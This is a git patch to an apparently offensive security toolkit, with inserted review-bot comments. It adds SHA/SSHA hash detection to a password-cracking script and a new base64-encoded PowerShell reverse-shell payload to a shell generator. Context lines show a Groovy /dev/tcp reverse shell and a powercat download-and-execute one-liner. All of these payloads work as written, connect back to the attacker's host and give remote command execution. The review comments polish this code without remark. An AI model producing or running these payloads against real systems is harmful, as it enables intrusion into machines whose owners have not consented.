From 2f555c5b9ec0661bd36a447d194fa444bf6d5147 Mon Sep 17 00:00:00 2001
From: Roman Hergenreder
Date: Mon, 11 Oct 2021 17:08:44 +0200
Subject: [PATCH] SSHA/SHA hash types + powershell reverse shell
---
 crack_hash.py | 10 ++++++++++
 genRevShell.py | 8 ++++++--
 2 files changed, 16 insertions(+), 2 deletions(-)
diff --git a/crack_hash.py b/crack_hash.py
index a23fd46..05b16b5 100755
--- a/crack_hash.py
+++ b/crack_hash.py
@@ -25,6 +25,8 @@ class HashType(enum.Enum):
 RAW_SHA1 = 100
 SHA1_PASS_SALT = 110
 SHA1_SALT_PASS = 120
+ SHA1 = 101
+ SSHA1 = 111
 # SHA2
 RAW_SHA2_224 = 1300
@@ -123,6 +125,14 @@ class Hash:
 elif "$" in raw_hash and raw_hash.startswith("pbkdf2_sha256$"):
 self.type.append(HashType.DJANGO_PBKDF2_SHA256)
 else:
+ m = re.match("^\{([^}]*)\}.*$", raw_hash)
+ if m:
+ hash_type = m[1]
+ if hash_type == "SHA":
+ self.type.append(HashType.SHA1)
+ elif hash_type == "SSHA":
+ self.type.append(HashType.SSHA1)
+
 if ":" in raw_hash:
 parts = raw_hash.split(":")
 if len(parts) == 2:
diff --git a/genRevShell.py b/genRevShell.py
index b41d343..519c12c 100755
--- a/genRevShell.py
+++ b/genRevShell.py
@@ -7,7 7,7 @@ import util
 import time
 import threading
 import readline
- 
+import base64
 def generatePayload(type, local_address, port): 
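Review bot: The pattern in `m = re.match("^\{([^}]*)\}.*$", raw_hash)` is not a raw string, so `\{` and `\}` are invalid escape sequences — a DeprecationWarning on current interpreters and a SyntaxWarning from Python 3.12, on the way to becoming an error; write it as `m = re.match(r"^\{([^}]*)\}.*$", raw_hash)`. The hunk also uses `re` without this commit adding an import, unlike the `import base64` it adds to genRevShell.py, so it presumably relies on `re` already being imported at the top of crack_hash.py — worth confirming, since a missing import would only surface as a NameError on the first value that reaches the `else:` branch. The scheme comparison is case-sensitive, so a lowercase `{ssha}` prefix would fall through untyped; if such inputs are expected, compare `m[1].upper()` instead. The enclosing method starts and ends outside the hunk.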
@@ -29,8 +29,12 @@ def generatePayload(type, local_address, port):
 return "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/%s/%d;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()" % (local_address, port)
 elif type == "xterm":
 return "xterm -display %s:1" % (local_address)
- elif type == "powercat" or type == "powershell":
+ elif type == "powercat":
 return "powershell.exe -c \"IEX(New-Object System.Net.WebClient).DownloadString('http://%s/powercat.ps1');powercat -c %s -p %d -e cmd\"" % (local_address, local_address, port)
+ elif type == "powershell":
+ payload = '$a=New-Object System.Net.Sockets.TCPClient("%s",%d);$d=$a.GetStream();[byte[]]$k=0..65535|%%{0};while(($i=$d.Read($k,0,$k.Length)) -ne 0){;$o=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($k,0,$i);$q=(iex $o 2>&1|Out-String);$c=$q+"$ ";$b=([text.encoding]::ASCII).GetBytes($c);$d.Write($b,0,$b.Length);$d.Flush()};$a.Close();' % (local_address, port)
+ payload_encoded = base64.b64encode(payload.encode("UTF-16LE")).decode()
+ return f"powershell.exe -exec bypass -enc {payload_encoded}"
 def triggerShell(func, port):
 def _wait_and_exec():
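Review bot: The new `powershell` branch builds its return value with an f-string while every other branch of generatePayload, including the `powercat` line directly above it, uses `%` formatting, and the template literal is a single very long line; for consistency either keep `%` here (`return "powershell.exe -exec bypass -enc %s" % payload_encoded`) or move the template into a named module-level constant so the branch reads like its siblings. `local_address` is interpolated unescaped into a double-quoted string inside the template, so a value containing a double quote produces a malformed command rather than an error — a check at the call site, or at least a comment stating the assumption that `local_address` is a plain host or IP, would help. generatePayload has no docstring; a one-line summary listing the accepted `type` values and noting that `port` is formatted with `%d` would make the branches easier to maintain. generatePayload's signature and its earlier branches are outside this hunk.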